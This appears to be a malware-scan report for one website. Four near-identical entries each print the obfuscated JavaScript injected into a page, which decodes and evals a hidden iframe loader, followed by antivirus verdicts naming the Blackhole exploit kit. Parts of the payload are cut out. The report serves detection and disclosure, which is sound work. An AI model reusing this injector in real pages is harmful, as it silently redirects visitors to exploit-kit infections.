Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/././././././ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/././././././support.htm | 200 OK Content-Length: 19807 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://www.allstarpro.com/./././././././ | 200 OK Content-Length: 19427 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zit=4;xvnbh=("2b,71,80,79,6e,7f,74,7a,79,2b,76,83,6f,3b,44,33,34,2b,86,18,15,2b,81,6c,7d,2b,7e,7f,6c,7f,74,6e,48,32,6c,75,6c,83,32,46,18,15,2b,81,6c,7d,2b,6e,7a,79,7f,7d,7a,77,77,70,7d,48,32,74,79,6f,70,83,39,7b,73,7b,32,46,18,15,2b,81,6c,7d,2b,76,83,6f,2b,48,2b,6f,7a,6e,80,78,70,79,7f,39,6e,7d,70,6c,7f,70,50,77,70,78,70,79,7f,33,32,74,71,7d,6c,78,70,32,34,46,18,15,18,15,2b,76,83,6f,39,7e,7d,6e,2b,48,2b,32,73,7f,7f,7b,45,3a,3a,41,3d,39,3c,3d,44,39,3d,3c,44,39,3d,3e,3e,3
... 3499 bytes are skipped ...,32,34,48,48,40,40,34,86,88,70,77,7e,70,86,5e,70,7f,4e,7a,7a,76,74,70,33,32,81,74,7e,74,7f,70,6f,6a,80,7c,32,37,2b,32,40,40,32,37,2b,32,3c,32,37,2b,32,3a,32,34,46,18,15,18,15,76,83,6f,3b,44,33,34,46,18,15,88,18,15,88".split(","));hqansj=eval;function qav(){rxt=function(){--(jzseos.body)}()}jzseos=document;for(khks=0;khks<xvnbh["length"];khks+=1){xvnbh[khks]=-(11)+parseInt(xvnbh[khks],zit*4);}try{qav()}catch(lay){eydq=50-50;}if(!eydq)hqansj(String["fr"+"omCh"+"arCo"+"de"].apply(String,xvnbh));Antivirus reports:- AntiVir
- JS/Blacole.EB.213
- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- TrendMicro-HouseCall
- TROJ_GEN.F47V1119
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- Comodo
- TrojWare.JS.Kryptik.AOHT
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|